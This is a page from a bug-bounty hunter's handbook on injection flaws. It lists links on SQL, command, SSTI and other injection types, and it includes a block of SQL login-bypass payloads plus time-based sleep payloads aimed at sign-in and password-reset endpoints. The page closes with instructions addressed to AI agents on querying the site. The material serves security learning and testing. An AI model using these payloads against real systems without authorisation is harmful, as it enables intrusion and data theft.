# Injection

**Blogs / Articles:**

* <https://medium.com/@jonathanbouman/blind-sql-injection-at-fasteditor-hema-com-6ac140c0d1a3>
* <https://threat.tevora.com/stop-collaborate-and-listen/> -Blind Command Injection - SSRF
* <https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38&srid=kl8Z>
* <https://gerbenjavado.com/manual-sql-injection-discovery-tips/>
* Practical JSONP Injection - [Practical JSONP Injection](https://securitycafe.ro/2017/01/18/practical-jsonp-injection/)
* XSLT Server Side Injection Attacks [https://contextis.com/blog/xslt-server-side-injection-attacks](https://t.co/ZqvTP3qZTZ?amp=1)
* Log Injection - <https://disconnect3d.pl/2018/02/24/log-injection-aka-tailing-logs-is-unsafe/>
* Remote Code Execution with EL injection - [https://betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html](https://t.co/eUvA6wDgFA?amp=1)
* Argument Injection - <https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2019/may/argument-injection-hammer/>
* Argument Injection - <https://staaldraad.github.io/post/2019-11-24-argument-injection/>
* Argument Injection - <https://docs.google.com/presentation/d/1U8r5CJs9dLOLO2-hj_bHidRMXugUl3ejv8Hdw6bDMv4/edit#slide=id.g29a70c6c35_0_68>
  * Video - <https://www.youtube.com/watch?v=FHiJnw9TTX8>
* **AST Injection, Prototype Pollution to RCE -** [**https://blog.p6.is/AST-Injection/#How-to-Detect**](https://blog.p6.is/AST-Injection/#How-to-Detect)
* **SSTI -** [**https://blog.isec.pl/beyond-ssti/**](https://blog.isec.pl/beyond-ssti/)
* [**https://bad-jubies.github.io/Blind-SQLi-1/**](https://bad-jubies.github.io/Blind-SQLi-1/)
* **Command Injection -**[**https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38\&srid=kl8Z**](https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38\&srid=kl8Z)
* [**https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17**](https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17)
* **CSS Injection -** [**https://medium.com/@tehmezovismayil/steal-input-datas-with-css-file-injection-bugbounty-449ba41a5092**](https://medium.com/@tehmezovismayil/steal-input-datas-with-css-file-injection-bugbounty-449ba41a5092)
* [**https://ansar0047.medium.com/blind-sql-injection-detection-and-exploitation-cheatsheet-17995a98fed1**](https://ansar0047.medium.com/blind-sql-injection-detection-and-exploitation-cheatsheet-17995a98fed1)
* [**https://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vulnerability-20b019553716**](https://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vulnerability-20b019553716)
* [**https://ismailtasdelen.medium.com/sql-injection-payload-list-b97656cfd66b**](https://ismailtasdelen.medium.com/sql-injection-payload-list-b97656cfd66b)
* **SQL Injection -** [**https://twitter.com/rodoassis/status/1438186092486877190?s=20**](https://twitter.com/rodoassis/status/1438186092486877190?s=20)
* [**https://outpost24.com/blog/X-forwarded-for-SQL-injection**](https://outpost24.com/blog/X-forwarded-for-SQL-injection)
* [How I Escalated a Time-Based SQL Injection to RCE](https://jmrcsnchz.medium.com/how-i-escalated-a-time-based-sql-injection-to-rce-bbf0d68cb398)
* #### <https://jmrcsnchz.medium.com/how-i-escalated-a-time-based-sql-injection-to-rce-bbf0d68cb398>

**Payloads / Cheatsheets:**

* <https://github.com/Gabriel-Labs/OOB-SQLi>
*

**Twitter Threads / Tips:**

* [**https://github.com/xer0days/SQLi-Query-Tampering**](https://github.com/xer0days/SQLi-Query-Tampering) **-** [**https://twitter.com/Xer0Days/status/1292488714241941504?s=20**](https://twitter.com/Xer0Days/status/1292488714241941504?s=20)
* [1. Time Based SQL Injection : Used payload: '+(select\*from(select(sleep(20)))a)+' in phone number parameter value for sign-in endpoint. Don't miss sign-in parameters \[Like username, email, otp\] for SQLi check. #bugbountytips 2. Reflected XSS + CSRF to Account Takeover : )](https://twitter.com/sunilyedla2/status/1333029227994628096?s=20)
* [Time based SQLi -> forgot password Endpoin](https://twitter.com/sunilyedla2/status/1339271046822678528?s=20)[1. Payload used: '%2b(select\*from(select(sleep(20)))a)%2b' 2. Endpoint: /Forgot password Cheers Do share your story in comments if you got SQLi at weird endpoint](https://twitter.com/sunilyedla2/status/1339271046822678528?s=20)
* SPEL Injection - <https://twitter.com/h1pmnh/status/1425831338234589184?s=20>
* EL Injection

{% embed url="<https://twitter.com/secalert/status/1119526862521282560?s=20>" %}

<br>

**Tools:**

**Other References:**

```
' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
```

[Bug Bounty Tips This is how to find sql-Injection 100% of the time /?q=1 /?q=1' /?q=1" /?q=\[1\] /?q\[\]=1 /?q=1\` /?q=1\ /?q=1/\*'\*/ /?q=1/\*!1111'\*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' #bugbounty #BugBountyTips #SqlInjection](https://twitter.com/community_bug/status/1345942914296205316?s=20)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gowthams.gitbook.io/bughunter-handbook/list-of-vulnerabilities-bugs/sqli.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.